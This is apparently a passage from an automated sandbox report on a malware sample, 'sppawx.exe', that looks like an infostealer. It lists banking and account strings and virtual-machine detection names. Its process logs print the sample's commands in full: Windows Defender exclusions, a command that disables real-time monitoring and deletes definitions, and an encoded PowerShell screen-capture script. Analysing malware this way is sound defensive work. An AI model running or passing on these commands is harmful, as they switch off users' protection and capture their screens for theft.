Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514721736.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\d
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: getmac.exe, 0000004F.00000003.1514721736.00000284F698E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514289207.00000284F698C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ($9CSf8vmusrvc
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1518449163.0000018C01588000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1518449163.0000018C0167C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1502382120.0000018C0167C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1325460441.0000018C014F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: hfecodevmware
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: hofecodevmsrvc
Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F882000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: getmac.exe, 0000004F.00000003.1514289207.00000284F69A5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000003.1514657123.00000284F69BE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004F.00000002.1515569310.00000284F69C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 0_2_00007FF79A31D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF79A31D19C

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 2_2_00007FFEDCCB7200 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFEDCCB7200

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 0_2_00007FF79A3334F0 GetProcessHeap,

0_2_00007FF79A3334F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A31D37C SetUnhandledExceptionFilter,	0_2_00007FF79A31D37C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A31D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF79A31D19C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A31C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF79A31C910
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 0_2_00007FF79A32A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF79A32A684
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A31D37C SetUnhandledExceptionFilter,	2_2_00007FF79A31D37C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A31D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF79A31D19C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A31C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF79A31C910
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FF79A32A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF79A32A684
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDCC6DA5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFEDCC6DA5C
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD2330E8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFEDD2330E8
Source: C:\Users\user\Desktop\sppawx.exe	Code function: 2_2_00007FFEDD273398 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFEDD273398
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62570B6D8 SetUnhandledExceptionFilter,	103_2_00007FF62570B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62570A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	103_2_00007FF62570A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF62570B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	103_2_00007FF62570B52C
Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Code function: 103_2_00007FF625714C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	103_2_00007FF625714C10

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sppawx.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
